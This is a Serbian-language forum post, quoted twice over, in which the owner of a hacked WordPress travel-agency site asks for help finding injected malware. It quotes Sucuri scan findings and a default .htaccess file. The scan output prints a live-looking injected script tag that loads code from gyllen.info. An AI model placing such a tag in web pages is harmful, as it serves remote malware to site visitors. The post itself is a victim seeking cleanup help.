Hajd da vidimo da li neko moze ovde da pomogne, situacija sledeca :
sajt turisticke agencije moje majke dobije malware, gde Sucuri izbacuje :
Website Malware malware-entry-mwanomalysp8 http://belatours.rs/404testpage4525d2fdc ( View Payload )
Website Malware malware-entry-mwanomalysp8 http://belatours.rs/404javascript.js ( View Payload )
Website Malware malware-entry-mwanomalysp8 http://belatours.rs/?s= ( View Payload )
Poruka je uvek ista
Posto sam seo da googlam, prvo sto sam naleteo je na .htaccess fajl, i da on moze biti izmenjen, pri cemu imam pet takvih fajlova na serveru :
Ovo je primer najveceg, gde apsolutno nigde ne vidim da bilo sta vodi ka nekoj redirekciji koja je ocigledno problem. Verujem da se kod zavukao negde, da li neko ima ideju gde da ga potrazim? Ono sto shvatam je da vrlo lako nema nigde direktne redirekcije u kodu, vec se poziva neka skripta koja prakticno vodi ka pomenutom Gyllen.info itd, sto tek ne vidim nacin kako da nadjem.
Momak koji je kacio ovaj sajt kaze ne zna da resi problem, a ja programer nisam, doduse, umem da se snadjem po kodu i delimicno shvatim sta cemu sluzi 🙂.
sajt turisticke agencije moje majke dobije malware, gde Sucuri izbacuje :
Website Malware malware-entry-mwanomalysp8 http://belatours.rs/404testpage4525d2fdc ( View Payload )
Website Malware malware-entry-mwanomalysp8 http://belatours.rs/404javascript.js ( View Payload )
Website Malware malware-entry-mwanomalysp8 http://belatours.rs/?s= ( View Payload )
Poruka je uvek ista
*Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script type="text/javascript" src="http://gyllen.info/gallery/zvqc74xh.php?id=146"></script>
Posto sam seo da googlam, prvo sto sam naleteo je na .htaccess fajl, i da on moze biti izmenjen, pri cemu imam pet takvih fajlova na serveru :
PHP:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
Ovo je primer najveceg, gde apsolutno nigde ne vidim da bilo sta vodi ka nekoj redirekciji koja je ocigledno problem. Verujem da se kod zavukao negde, da li neko ima ideju gde da ga potrazim? Ono sto shvatam je da vrlo lako nema nigde direktne redirekcije u kodu, vec se poziva neka skripta koja prakticno vodi ka pomenutom Gyllen.info itd, sto tek ne vidim nacin kako da nadjem.
Momak koji je kacio ovaj sajt kaze ne zna da resi problem, a ja programer nisam, doduse, umem da se snadjem po kodu i delimicno shvatim sta cemu sluzi 🙂.
Poslednja izmena: